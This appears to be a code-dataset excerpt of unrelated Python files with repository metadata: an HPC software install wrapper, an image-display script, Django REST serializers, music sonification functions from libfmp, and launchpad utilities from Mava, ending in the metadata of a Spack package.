    d = directories(prefix = prefix + "/",
                    relativeprefix= os.path.abspath("/" + my_prog + "/" + bin_dep) + "/",
                    basemoduledir = moduledir + "/",
                    idepmoduledir = moduledir + "/idep/",
                    cdepmoduledir = cdep_dir)
    return d
def prepare_variables_and_warn(dirs, options):
    """Export the HPCI_* environment variables consumed by the install
    script, echo them, and (for csgteam installs without --bypass-prompt)
    ask for confirmation before proceeding.  Returns the variable dict.
    """
    variables = OrderedDict([
                 ('HPCI_SW_DIR', dirs.prefix),
                 ('HPCI_SW_NAME', options.prog),
                 ('HPCI_SW_VERSION', options.vers),
                 ('HPCI_MOD_DIR', dirs.basemoduledir),
                 ('HPCI_MOD_DIR_IDEP', dirs.idepmoduledir),
                 ('HPCI_MOD_DIR_CDEP', dirs.cdepmoduledir),
                 ('HPCI_MOD_PREREQ', options.prereq),
                 ])
    print term.bold_green("Setting environmental variables:")
    for key in variables:
        os.environ[key] = variables[key]
        print "{:<17}".format(key), "=", variables[key]
    ask_confirmation_for(options.csgteam and not options.bypass_prompt,
                         "This will attempt global install in " + dirs.prefix +
                         " by running ./" + options.install_script.name + " as " + os.environ['USER'] + ". Continue? ")
    return variables
# Saved original sys.stdout while output is redirected (None = not redirected).
real_stdout = None

def redirect_output(log):
    """Redirect sys.stdout to the file `log`, remembering the original stream."""
    global real_stdout
    if real_stdout is None:
        real_stdout = sys.stdout
    elif sys.stdout is not real_stdout:
        # avoid leaking a previously opened log file on repeated redirects
        sys.stdout.close()
    sys.stdout = open(log, 'w')

def restore_output():
    """Undo redirect_output(): flush/close the log file and restore sys.stdout.

    Bug fix: the log file was previously never closed, leaking the handle
    and leaving the last writes unflushed.
    """
    global real_stdout
    if real_stdout is not None:
        if sys.stdout is not real_stdout:
            sys.stdout.close()
        sys.stdout = real_stdout
        real_stdout = None
def start_logging_current_session(files_to_archive, log=HPCi_log, continuation=False):
    """Start (or, with continuation=True, resume) teeing stdout to `log`
    and schedule the log for archiving.  `tee` and the default HPCi_log
    are module-level globals defined elsewhere in this file.
    """
    if continuation:
        tee.append_out_to(log)
    else:
        tee.overwrite_out_to(log)
    files_to_archive.append(log)
def stop_logging_current_session():
    """Stop teeing stdout: close every file the module-level `tee` has open."""
    tee.close_all_files()
def wrap_command_for_stopping_on_errors(command):
    """Return `command` wrapped in a bash subshell running under 'set -e',
    so that execution aborts at the first failing statement."""
    return "(set -e; " + command + ")"
def subcall(command, log=None, use_popen = False, debug=False, stop_on_errors=False):
    """Run `command` through a shell.

    Optionally redirects stdout+stderr to `log` (bash '&>'), wraps the
    command with 'set -e' (stop_on_errors), and either returns the exit
    code (default) or a Popen object with piped output (use_popen=True).
    """
    if stop_on_errors:
        command = wrap_command_for_stopping_on_errors(command)
    if log:
        command += " &> " + log  # bash-ism: redirect stdout and stderr together
    if debug:
        print >> sys.stderr, term.bold_blue("DEBUG: " + command)
    if use_popen:
        return subprocess.Popen(command, stderr=subprocess.STDOUT, stdout = subprocess.PIPE, shell=True)
    else:
        return subprocess.call(command, shell=True)
def log_full_env(files_to_archive, log_modules=True):
    """Dump the current environment (and optionally `module list`) to the
    module-level log files env_log / module_log (defined elsewhere in this
    file) and schedule them for archiving.
    """
    print term.bold_green("Saving environment status in " + env_log + "..."),
    subcall("env", env_log)
    print "Done."
    files_to_archive.append(env_log)
    if log_modules:
        print term.bold_green("Saving module list in " + module_log + "..."),
        subcall("module list", module_log)
        print "Done.\n"
        files_to_archive.append(module_log)
def expandvars_in_bash(expression):
    """Expand `expression` with bash (via echo) so $VARs resolve exactly as
    in a shell, then normalize the result as a path.

    # NOTE(review): the '/' check presumably guards against an expansion
    # that reduces to the filesystem root -- confirm intended semantics.
    """
    value = os.path.normpath(subprocess.check_output(["bash", "-c", 'echo -n "' + expression + '"']))
    if value =='/':
        value = ''
    return value
def identify_compiler_mpi(options):
    """Return (binary_subdir, module_subdir) obtained by bash-expanding the
    configured sw_install_struct / mod_install_struct templates, after
    sanity-checking the LMOD_FAMILY_* environment.
    """
    verify_compiler_mpi(options)
    bin_comp_mpi = expandvars_in_bash(options.defaults['sw_install_struct'])
    mod_comp_mpi = expandvars_in_bash(options.defaults['mod_install_struct'])
    return bin_comp_mpi, mod_comp_mpi
def verify_compiler_mpi(options):
    """Sanity-check the LMOD_FAMILY_* environment against the configured
    install structures; exits if a *_VERSION variable is missing for a
    loaded compiler/MPI family, and warns when the config templates do
    not reference these variables.
    """
    compiler = os.environ.get('LMOD_FAMILY_COMPILER','').strip()
    mpi = ""
    try:
        if compiler:
            compiler += "/" + os.environ['LMOD_FAMILY_COMPILER_VERSION'].strip()
            mpi = os.environ.get('LMOD_FAMILY_MPI','').strip()
            if mpi:
                mpi += "/" + os.environ['LMOD_FAMILY_MPI_VERSION'].strip() + "/"
    except KeyError, ke:
        # a family was loaded but its version variable is absent
        for broken_key in ke.args:
            print >> sys.stderr, term.bold_red("Error: " + broken_key + " not set")
        sys.exit(1)
    vars = ('LMOD_FAMILY_COMPILER', 'LMOD_FAMILY_COMPILER_VERSION', 'LMOD_FAMILY_MPI', 'LMOD_FAMILY_MPI_VERSION')
    for v in vars:
        if not v in options.defaults['sw_install_struct']:
            print >> sys.stderr, term.on_black_bold_yellow("Warning: " + v + " not used in sw_install_struct of config.hpcinstall.yaml")
        if not v in options.defaults['mod_install_struct']:
            print >> sys.stderr, term.on_black_bold_yellow("Warning: " + v + " not used in mod_install_struct of config.hpcinstall.yaml")
def parse_installscript_for_directives(install_script_str, argument = ""):
    """Collect the payloads of '#HPCI <argument>' lines from a script.

    For each line starting with '#HPCI <argument>', the directive prefix
    is removed, any trailing ' #...' comment is dropped, and the remainder
    is stripped.  Returns the payloads in file order (possibly empty).
    """
    prefix = "#HPCI " + argument
    return [
        line.replace(prefix, "", 1).split(" #")[0].strip()
        for line in install_script_str.splitlines(True)
        if line.startswith(prefix)
    ]
def parse_installscript_for_modules(install_script_str):
    """Build the module-loading shell prefix from '#HPCI -x/-l/-p' directives.

    Returns (modules_to_load, modules_prereq): a command string starting
    with 'module purge' (always ending in '; '), and a comma-separated
    list of double-quoted '-p' prerequisite module names.
    """
    exec_list = parse_installscript_for_directives(install_script_str, "-x")
    mtlo_list = parse_installscript_for_directives(install_script_str, "-l")
    mtlp_list = parse_installscript_for_directives(install_script_str, "-p")
    if len(exec_list) > 0:
        # '-x' lines are arbitrary commands executed after the purge
        modules_to_load = "module purge; " + "; ".join(exec_list)
    else:
        modules_to_load = "module purge"
    if len(mtlo_list) > 0:
        modules_to_load += "; ml " + " ".join(mtlo_list)
    if len(mtlp_list) > 0:
        modules_to_load += "; ml " + " ".join(mtlp_list)
    # quote each individual prerequisite module name
    quoted_mtlp_list = []
    for mod in mtlp_list:
        for m in mod.split(" "):
            quoted_mtlp_list.append('"' + m + '"')
    return modules_to_load + "; ", ",".join(quoted_mtlp_list)
def execute_installscript(options, files_to_archive, module_use):
    """Run the user's install script, teeing its output to a timestamped
    log that is appended to `files_to_archive` together with the script
    itself.  On a non-zero exit the user is asked whether to archive
    the logs anyway.
    """
    current_perm = os.stat(options.install_script.name)
    if not options.csgteam: # too often this fail for csgteam
        os.chmod(options.install_script.name, current_perm.st_mode | stat.S_IEXEC)
    print term.bold_green("Running ./" + options.install_script.name + "...")
    stop_logging_current_session() # log the output of the script in a different dir
    log = "hpci." + os.path.basename(options.install_script.name) + "-" + str(
          datetime.datetime.now().isoformat().split(".")[0].replace("-", "").replace(":", "")) + ".log" # 20161116T114145
    start_logging_current_session(files_to_archive, log=log)
    p = subcall(module_use + "./" + options.install_script.name, use_popen=True, debug=options.debug)
    process_output = " "
    while process_output != "": # continue while the process is running, it'll be "" when EOF is reached
        process_output = p.stdout.readline() # needs to do this instead of using subprocess.call to allow
        print process_output, # 'tee' to log the process output
    p.wait()
    stop_logging_current_session()
    files_to_archive.append(log)
    start_logging_current_session(files_to_archive, continuation=True)
    print term.bold_green("Done running ./" + options.install_script.name + " - exited with code " + str(p.returncode))
    if p.returncode != 0:
        ask_confirmation_for(True, "Running " + options.install_script.name + " failed. Archive logs anyway? ")
    files_to_archive.append(options.install_script.name)
def archive_in(prefix, files_to_archive):
    """Copy every entry of `files_to_archive` into <prefix>/BUILD_DIR/,
    creating that directory if needed.  Plain files are copied with
    copyfile; anything else is copied recursively (symlinks preserved).
    """
    build_dir = prefix + "/BUILD_DIR/"
    if not os.path.exists(build_dir):
        os.makedirs(build_dir)
    for entry in files_to_archive:
        destination = build_dir + os.path.basename(entry)
        if os.path.isfile(entry):
            shutil.copyfile(entry, destination)
        else:
            shutil.copytree(entry, destination, symlinks=True)
def how_to_call_yourself(args, yourself, pwd, opt):
    """Build the command used to re-invoke hpcinstall with a reset environment.

    Returns (new_invocation, use_shell): a shell string (when --preserve
    keeps the user's environment) or an ssh-to-localhost argv list that
    resets the environment first.
    """
    # Assuming bash makes things MUCH easier, dropping support for other shells
    # (it is not less general, since bash can call tcsh, csh, ksh, python, etc.)
    # Should support for other shells be added, needs to be done at least in
    # wrap_command_for_stopping_on_errors() too.
    shell = ["/bin/bash"] #os.environ['SHELL']
    python = opt.defaults.get('python_cmd', '')
    if python:
        python += " "
    if "bash" in shell[0]:
        shell.append('-l')
    shell.append('-c')
    args_copy = list(args)
    args_copy[0] = os.path.abspath(yourself + "/hpcinstall")
    # pass the invoking user through --nossh so the child can recover it
    reset_env_hack = "--nossh " + os.environ.get('SUDO_USER', '')
    args_copy.append(reset_env_hack.strip())
    comb_cmd = opt.modules_to_load + " cd " + pwd + "; " + python + " ".join(args_copy)
    if opt.preserve:
        new_invocation = comb_cmd
        use_shell = True
    else:
        if opt.defaults['use_modules']:
            module_prefix = "ml purge; "
        else:
            module_prefix = ""
        new_invocation = ["ssh","-X","-t","localhost"] + shell + ["'" + module_prefix + comb_cmd + "'"]
        use_shell = False
    return new_invocation, use_shell
def howto_push_to_github(args, shortprefix):
    """Build a shell one-liner that archives the install script into the
    configured git repository and pushes it.

    Returns '' when no 'script_repo' is configured in the defaults.
    """
    repo = args.defaults.get('script_repo', '')
    if not repo:
        return ""
    git = args.defaults.get('git_cmd', 'git')
    target = repo + shortprefix
    steps = [
        "mkdir -p " + target,
        "cp " + args.install_script.name + " " + target,
        "cd " + repo,
        git + " add " + shortprefix[1:],  # drop the leading slash for a repo-relative path
        (git + ' -c "user.name=${SUDO_USER}" -c "user.email=${SUDO_USER}" commit -m "'
         + args.prog + " v" + args.vers + ' install in `hostname` on `date`"'),
    ]
    return " && ".join(steps) + " && " + git + " push"
# execution starts here
if __name__ == "__main__":
    files_to_archive = []
    options = parse_command_line_arguments(files_to_archive)
    script_dir = os.path.dirname(os.path.realpath(__file__)) # directory where this script is
    # hack to reset the environment -- assume everything into the environment has been
    # reset, and continue executing "as is" the following `if` did not exist.
    if not options.nossh:
        # first pass: re-invoke ourselves (possibly over ssh) with a clean environment
        exe_cmd, use_shell = how_to_call_yourself(sys.argv, script_dir, os.getcwd(), options)
        sys.exit(subprocess.call(exe_cmd, shell = use_shell))
    bin_comp_mpi, mod_comp_mpi = identify_compiler_mpi(options)
    dirs = get_prefix_and_moduledir(options, bin_comp_mpi, mod_comp_mpi)
    log_full_env(files_to_archive, log_modules = options.defaults['use_modules'])
    start_logging_current_session(files_to_archive)
    print_invocation_info()
    prepare_variables_and_warn(dirs, options)
    execute_installscript(options, files_to_archive, "")
    for tarball in options.tarballs:
        print term.blue("Archiving file: " + tarball)
    for u in options.urls:
        print term.blue("For more details about this code, see URL: " + u)
    print term.bold_green("Hashdir:"), hashdir.hashdir(dirs.prefix), os.path.abspath(os.path.expanduser(dirs.prefix))
    stop_logging_current_session()
    hashlog = "hpci.fileinfo.log"
    # write the per-file hash listing to its own log, then archive everything
    redirect_output(hashlog)
    hashdir.hashdir(dirs.prefix, verbose=True)
    restore_output()
    files_to_archive.append(hashlog)
    archive_in(dirs.prefix, files_to_archive)
    if options.csgteam:
        exe_cmd = howto_push_to_github(options, dirs.relativeprefix)
        if exe_cmd:
            sys.exit(subprocess.call(exe_cmd, shell=True))
| 46.719577 | 160 | 0.638014 |
07a6b3ffeb25cfc25463e7fad9472a0b77d3c65e | 314 | py | Python | HelloWorldFileListAndLoad.py | jhbrito/HelloWorlds | 7e2247ca7f312a516ce6a5054913d59e2f1de0f9 | [
"MIT"
] | 6 | 2020-02-14T15:18:14.000Z | 2022-02-22T15:40:33.000Z | HelloWorldFileListAndLoad.py | jhbrito/HelloWorlds | 7e2247ca7f312a516ce6a5054913d59e2f1de0f9 | [
"MIT"
] | null | null | null | HelloWorldFileListAndLoad.py | jhbrito/HelloWorlds | 7e2247ca7f312a516ce6a5054913d59e2f1de0f9 | [
"MIT"
] | null | null | null | import os
import PIL.Image as PImage
import matplotlib.pyplot as plt
# Directory containing the training images to display.
pasta = "membrane/train/image"
list_of_files = os.scandir(pasta)
# Open and show every image in the folder, one at a time, in grayscale.
# NOTE(review): loop variable `file` shadows the `file` builtin name.
for file in list_of_files:
    file_path = os.path.join(pasta, file.name)
    image = PImage.open(file_path)
    plt.imshow(image, cmap=plt.cm.gray)
    plt.show()
print("End")
| 20.933333 | 46 | 0.72293 |
7819c220f6769efa33d8e78f9c4b3bb1f4219fff | 1,589 | py | Python | api/api/serializers.py | WadeBarnes/representation-grant-app | 8f85b9664dddff220df5f5a5dc5aa538561d806f | [
"Apache-2.0"
] | null | null | null | api/api/serializers.py | WadeBarnes/representation-grant-app | 8f85b9664dddff220df5f5a5dc5aa538561d806f | [
"Apache-2.0"
] | null | null | null | api/api/serializers.py | WadeBarnes/representation-grant-app | 8f85b9664dddff220df5f5a5dc5aa538561d806f | [
"Apache-2.0"
] | null | null | null | """
REST API Documentation for Family Law Act
OpenAPI spec version: v1
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from rest_framework import serializers
from api.models import SurveyResult, User, Application
class UserSerializer(serializers.ModelSerializer):
    """Serializes only the primary key of a User."""
    class Meta:
        model = User
        fields = ["id"]
class ApplicationListSerializer(serializers.ModelSerializer):
    """Compact Application representation intended for list views."""
    class Meta:
        model = Application
        fields = [
            "id",
            "app_type",
            "last_updated",
            "last_filed"
        ]
class ApplicationSerializer(serializers.ModelSerializer):
    """Full Application representation (all model fields)."""
    # NOTE(review): 'app_user_Id' has inconsistent casing and is declared
    # many=True on a nested serializer -- confirm it matches the model relation.
    app_user_Id = UserSerializer(many=True, required=False)
    class Meta:
        model = Application
        fields = "__all__"
class SurveySerializer(serializers.ModelSerializer):
    """Serializes SurveyResult records including their timestamps."""
    class Meta:
        model = SurveyResult
        fields = [
            "id",
            "create_timestamp",
            "update_timestamp",
            "collection",
            "survey_type",
            "result",
            "user_id",
        ]
8e3243b42d2b460f5a017eae4175d3d15d233d15 | 9,980 | py | Python | libfmp/b/b_sonification.py | arfon/libfmp | 86f39a323f948a5f104f768442359e93620b2bab | [
"MIT"
] | 55 | 2020-12-14T08:33:10.000Z | 2022-03-22T16:36:41.000Z | libfmp/b/b_sonification.py | arfon/libfmp | 86f39a323f948a5f104f768442359e93620b2bab | [
"MIT"
] | 6 | 2021-06-25T09:11:29.000Z | 2021-12-17T13:55:19.000Z | libfmp/b/b_sonification.py | arfon/libfmp | 86f39a323f948a5f104f768442359e93620b2bab | [
"MIT"
] | 8 | 2021-06-30T08:34:38.000Z | 2022-01-11T15:59:17.000Z | """
Module: libfmp.b.b_sonification
Author: Meinard Mueller, Tim Zunner
License: The MIT license, https://opensource.org/licenses/MIT
This file is part of the FMP Notebooks (https://www.audiolabs-erlangen.de/FMP).
"""
import numpy as np
def list_to_chromagram(note_list, num_frames, frame_rate):
    """Convert a list of note events into a binary chromagram matrix.

    Args:
        note_list (list): Note events as (start_sec, duration_sec, midi_pitch, ...)
            tuples (e.g. read from CSV by :func:`libfmp.c1.c1s2_symbolic_rep.csv_to_list`)
        num_frames (int): Desired number of frames for the matrix
        frame_rate (float): Frame rate for C (in Hz)

    Returns:
        C (np.ndarray): Chromagram matrix of shape (12, num_frames)
    """
    C = np.zeros((12, num_frames))
    for note in note_list:
        start_sec, duration_sec, pitch = note[0], note[1], note[2]
        first_frame = max(0, int(start_sec * frame_rate))
        last_frame = min(num_frames, int((start_sec + duration_sec) * frame_rate) + 1)
        C[int(pitch % 12), first_frame:last_frame] = 1
    return C
def generate_shepard_tone(chromaNum, Fs, N, weight=1, Fc=440, sigma=15, phase=0):
    """Generate a Shepard tone signal as np.ndarray.

    A Shepard tone is a superposition of sinusoids spaced one octave apart
    whose amplitudes follow a Gaussian envelope centred on MIDI pitch 60.

    Args:
        chromaNum (int): 1=C,...
        Fs (scalar): Sampling frequency
        N (int): Desired length (in samples)
        weight (float): Scaling factor [0:1] (Default value = 1)
        Fc (float): Frequency for A4 (Default value = 440)
        sigma (float): Parameter for envelope of Shepard tone (Default value = 15)
        phase (float): Phase of sine (Default value = 0)

    Returns:
        tone (np.ndarray): Shepard tone
    """
    tone = np.zeros(N)
    # Map the chroma index to a low starting MIDI pitch, folded into range.
    pitch = 24 + chromaNum
    if pitch > 32:
        pitch = pitch - 12
    envelope_scale = 1 / (np.sqrt(2 * np.pi) * sigma)  # Gaussian normalisation
    time_axis = np.arange(N) / Fs
    while pitch < 108:
        # Gaussian amplitude envelope centred on MIDI pitch 60.
        amplitude = envelope_scale * np.exp(-(pitch - 60) ** 2 / (2 * sigma ** 2))
        partial = np.sin(2 * np.pi * np.power(2, ((pitch - 69) / 12)) * Fc * (time_axis + phase))
        tone = tone + weight * amplitude * partial
        pitch = pitch + 12
    return tone
def sonify_chromagram(chroma_data, N, frame_rate, Fs, fading_msec=5):
    """Generate a sonification of the chroma features from a chromagram matrix using shepard tones.

    Args:
        chroma_data (np.ndarray): A chromagram (e.g., gathered from a list of note events by
            :func:`libfmp.b.b_sonification.list_to_chromagram`)
        N (int): Length of the sonification (in samples)
        frame_rate (float): Frame rate for C (in Hz)
        Fs (float): Sampling frequency (in Hz)
        fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
            (Default value = 5)

    Returns:
        chroma_son (np.ndarray): Sonification of the chromagram, peak-normalized
    """
    chroma_son = np.zeros((N,))
    fade_sample = int(fading_msec / 1000 * Fs)  # fade length in samples
    for i in range(12):
        if np.sum(np.abs(chroma_data[i, :])) > 0:  # skip silent chroma bands
            shepard_tone = generate_shepard_tone(i, Fs, N)
            weights = np.zeros((N,))
            for j in range(chroma_data.shape[1]):
                if np.abs(chroma_data[i, j]) > 0:
                    # frame j covers samples around j/frame_rate (half a frame each side)
                    start = min(N, max(0, int((j - 0.5) * Fs / frame_rate)))
                    end = min(N, int((j + 0.5) * Fs / frame_rate))
                    fade_start = min(N, max(0, start+fade_sample))
                    fade_end = min(N, end+fade_sample)
                    # constant weight in the middle, linear ramps at both ends
                    weights[fade_start:end] += chroma_data[i, j]
                    weights[start:fade_start] += np.linspace(0, chroma_data[i, j], fade_start-start)
                    weights[end:fade_end] += np.linspace(chroma_data[i, j], 0, fade_end-end)
            chroma_son += shepard_tone * weights
    chroma_son = chroma_son / np.max(np.abs(chroma_son))  # peak-normalize
    return chroma_son
def sonify_chromagram_with_signal(chroma_data, x, frame_rate, Fs, fading_msec=5, stereo=True):
    """Sonifiy the chroma features from a chromagram matrix (using :func:`libfmp.b.b_sonification.sonify_chromagram`)
    together with a corresponding signal.

    Args:
        chroma_data (np.ndarray): A chromagram (e.g., gathered from a list of note events by
            :func:`libfmp.b.b_sonification.list_to_chromagram`)
        x (np.ndarray): Original signal
        frame_rate (float): Frame rate for the chromagram (in Hz)
        Fs (float): Sampling frequency (in Hz)
        fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
            (Default value = 5)
        stereo (bool): Decision between stereo and mono sonification (Default value = True)

    Returns:
        chroma_son (np.ndarray): Sonification of the chromagram
        out (np.ndarray): Sonification combined with the original signal, peak-normalized
    """
    N = x.size
    chroma_son = sonify_chromagram(chroma_data, N, frame_rate, Fs, fading_msec=fading_msec)
    # match the sonification's RMS level to the signal's
    chroma_scaled = chroma_son * np.sqrt(np.mean(x**2)) / np.sqrt(np.mean(chroma_son**2))
    if stereo:
        # one channel per row: original signal first, sonification second
        out = np.vstack((x, chroma_scaled))
    else:
        out = x + chroma_scaled
    out = out / np.amax(np.abs(out))  # peak-normalize the mix
    return chroma_son, out
def list_to_pitch_activations(note_list, num_frames, frame_rate):
    """Convert a list of note events into a binary pitch activation matrix.

    Args:
        note_list (list): Note events as (start_sec, duration_sec, midi_pitch, ...)
            tuples (e.g. read from CSV by :func:`libfmp.c1.c1s2_symbolic_rep.csv_to_list`)
        num_frames (int): Desired number of frames for the matrix
        frame_rate (float): Frame rate for P (in Hz)

    Returns:
        P (np.ndarray): Activation matrix of shape (128, num_frames); row p
            corresponds to MIDI pitch p + 1
        F_coef_MIDI (np.ndarray): MIDI pitch axis [1..128]
    """
    P = np.zeros((128, num_frames))
    F_coef_MIDI = np.arange(128) + 1
    for note in note_list:
        start_sec, duration_sec, pitch = note[0], note[1], note[2]
        first_frame = max(0, int(start_sec * frame_rate))
        last_frame = min(num_frames, int((start_sec + duration_sec) * frame_rate) + 1)
        P[int(pitch - 1), first_frame:last_frame] = 1
    return P, F_coef_MIDI
def sonify_pitch_activations(P, N, frame_rate, Fs, min_pitch=1, Fc=440, harmonics_weights=[1], fading_msec=5):
    """Sonify the pitches from a pitch activation matrix using sinusoidals.

    Args:
        P (np.ndarray): A pitch activation matrix (e.g., gathered from a list of note events by
            :func:`libfmp.b.b_sonification.list_to_pitch_activations`). First axis: Indexed by [0:127],
            encoding MIDI pitches [1:128]
        N (int): Length of the sonification (in samples)
        frame_rate (float): Frame rate for P (in Hz)
        Fs (float): Sampling frequency (in Hz)
        min_pitch (int): Lowest MIDI pitch in P (Default value = 1)
        Fc (float): Tuning frequency (in Hz) (Default value = 440)
        harmonics_weights (list): A list of weights for the harmonics of the tones to be sonified
            (Default value = [1])
        fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
            (Default value = 5)

    Returns:
        pitch_son (np.ndarray): Sonification of the pitch activation matrix, peak-normalized
    """
    fade_sample = int(fading_msec / 1000 * Fs)  # fade length in samples
    pitch_son = np.zeros((N,))
    for p in range(P.shape[0]):
        if np.sum(np.abs(P[p, :])) > 0:  # skip inactive pitches
            pitch = min_pitch + p
            freq = (2 ** ((pitch - 69) / 12)) * Fc  # equal-tempered frequency of the pitch
            sin_tone = np.zeros((N,))
            # superimpose the weighted harmonics of the fundamental
            for i, cur_harmonic_weight in enumerate(harmonics_weights):
                sin_tone += cur_harmonic_weight * np.sin(2 * np.pi * (i+1) * freq * np.arange(N) / Fs)
            weights = np.zeros((N,))
            for n in range(P.shape[1]):
                if np.abs(P[p, n]) > 0:
                    start = min(N, max(0, int((n - 0.5) * Fs / frame_rate)))
                    end = min(N, int((n + 0.5) * Fs / frame_rate))
                    fade_start = min(N, start+fade_sample)
                    fade_end = min(N, end+fade_sample)
                    # constant weight in the middle, linear ramps at both ends
                    weights[fade_start:end] += P[p, n]
                    weights[start:fade_start] += np.linspace(0, P[p, n], fade_start-start)
                    weights[end:fade_end] += np.linspace(P[p, n], 0, fade_end-end)
            pitch_son += weights * sin_tone
    pitch_son = pitch_son / np.max(np.abs(pitch_son))  # peak-normalize
    return pitch_son
def sonify_pitch_activations_with_signal(P, x, frame_rate, Fs, min_pitch=1, Fc=440, harmonics_weights=[1],
                                         fading_msec=5, stereo=True):
    """Sonify the pitches from a pitch activation matrix (using
    :func:`libfmp.b.b_sonification.sonify_pitch_activations`) together with a corresponding signal.

    Args:
        P (np.ndarray): A pitch activation matrix (e.g., gathered from a list of note events by
            :func:`libfmp.b.b_sonification.list_to_pitch_activations`)
        x (np.ndarray): Original signal
        frame_rate (float): Frame rate for P (in Hz)
        Fs (float): Sampling frequency (in Hz)
        min_pitch (int): Lowest MIDI pitch in P (Default value = 1)
        Fc (float): Tuning frequency (in Hz) (Default value = 440)
        harmonics_weights (list): A list of weights for the harmonics of the tones to be sonified
            (Default value = [1])
        fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
            (Default value = 5)
        stereo (bool): Decision between stereo and mono sonification (Default value = True)

    Returns:
        pitch_son (np.ndarray): Sonification of the pitch activation matrix
        out (np.ndarray): Sonification combined with the original signal

    NOTE(review): unlike sonify_chromagram_with_signal, `out` is NOT
    peak-normalized here -- confirm whether this asymmetry is intentional.
    """
    N = x.size
    pitch_son = sonify_pitch_activations(P, N, frame_rate, Fs, min_pitch=min_pitch, Fc=Fc,
                                         harmonics_weights=harmonics_weights, fading_msec=fading_msec)
    # match the sonification's RMS level to the signal's
    pitch_scaled = pitch_son * np.sqrt(np.mean(x**2)) / np.sqrt(np.mean(pitch_son**2))
    if stereo:
        # one channel per row: original signal first, sonification second
        out = np.vstack((x, pitch_scaled))
    else:
        out = x + pitch_scaled
    return pitch_son, out
| 40.241935 | 117 | 0.613327 |
0d14eeaabf35bc5d4ff2647a6addbbb2262be520 | 4,120 | py | Python | mava/utils/lp_utils.py | sash-a/Mava | 976d0863e058fd92f066d8a8fabe2f5e2f3f60ce | [
"Apache-2.0"
] | 337 | 2021-07-06T09:09:56.000Z | 2022-03-30T21:42:37.000Z | mava/utils/lp_utils.py | sash-a/Mava | 976d0863e058fd92f066d8a8fabe2f5e2f3f60ce | [
"Apache-2.0"
] | 125 | 2021-07-12T11:38:37.000Z | 2022-03-30T19:22:53.000Z | mava/utils/lp_utils.py | sash-a/Mava | 976d0863e058fd92f066d8a8fabe2f5e2f3f60ce | [
"Apache-2.0"
] | 43 | 2021-07-06T19:44:37.000Z | 2022-03-07T09:29:07.000Z | # python3
# Copyright 2021 InstaDeep Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility function for building and launching launchpad programs."""
import functools
import inspect
from typing import Any, Callable, Dict, List, Optional
import launchpad as lp
from absl import flags, logging
from acme.utils import counting
from launchpad.nodes.python.local_multi_processing import PythonProcess
from mava.utils.training_utils import non_blocking_sleep
FLAGS = flags.FLAGS
def to_device(program_nodes: List, nodes_on_gpu: List = ["trainer"]) -> Dict:
    """Specifies which nodes should run on gpu.

    If nodes_on_gpu is an empty list, this returns a cpu only config.

    Args:
        program_nodes (List): nodes in lp program.
        nodes_on_gpu (List, optional): nodes to run on gpu. Defaults to ["trainer"].

    Returns:
        Dict: dict with cpu only lp config.
    """
    # CPU-only nodes get CUDA_VISIBLE_DEVICES=-1 (hides all GPUs); nodes meant
    # to see the GPU get [] i.e. no special launch configuration.
    return {
        node: PythonProcess(env={"CUDA_VISIBLE_DEVICES": str(-1)})
        if (node not in nodes_on_gpu)
        else []
        for node in program_nodes
    }
def partial_kwargs(function: Callable[..., Any], **kwargs: Any) -> Callable[..., Any]:
    """Return a partial function application by overriding default keywords.

    Equivalent to `functools.partial(function, **kwargs)`, except that a
    `ValueError` is raised when called if any given keyword is not a
    defaulted parameter of `function`.  This is useful as a way to define
    a factory function with default parameters and then to override them
    in a safe way.

    Args:
        function: the base function before partial application.
        **kwargs: keyword argument overrides.

    Returns:
        A function.
    """
    spec = inspect.getfullargspec(function)
    # Only parameters that carry defaults may be overridden.
    if spec.defaults is None:
        overridable = []
    else:
        overridable = spec.args[-len(spec.defaults):]
    unknown = set(kwargs).difference(overridable)
    if unknown:
        raise ValueError(
            "Cannot override unknown or non-default kwargs: {}".format(", ".join(unknown)))
    return functools.partial(function, **kwargs)
class StepsLimiter:
    """Process that terminates an experiment when `max_steps` is reached."""

    def __init__(
        self,
        counter: counting.Counter,
        max_steps: Optional[int],
        steps_key: str = "executor_steps",
    ):
        # counter: shared counter queried for the current step counts.
        # max_steps: threshold after which lp.stop() is called.
        # steps_key: which entry of the counts dict to watch.
        self._counter = counter
        self._max_steps = max_steps
        self._steps_key = steps_key

    def run(self) -> None:
        """Run steps limiter to terminate an experiment when max_steps is reached."""
        logging.info(
            "StepsLimiter: Starting with max_steps = %d (%s)",
            self._max_steps,
            self._steps_key,
        )
        while True:
            # Update the counts.
            counts = self._counter.get_counts()
            num_steps = counts.get(self._steps_key, 0)
            logging.info("StepsLimiter: Reached %d recorded steps", num_steps)

            if num_steps > self._max_steps:
                logging.info(
                    "StepsLimiter: Max steps of %d was reached, terminating",
                    self._max_steps,
                )
                lp.stop()
            # Don't spam the counter.
            non_blocking_sleep(10)
| 33.225806 | 86 | 0.667233 |
0300847923582421da826aab2c40f33b1c944e7a | 1,714 | py | Python | var/spack/repos/builtin/packages/opus/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2018-11-27T03:39:44.000Z | 2021-09-06T15:50:35.000Z | var/spack/repos/builtin/packages/opus/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | var/spack/repos/builtin/packages/opus/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
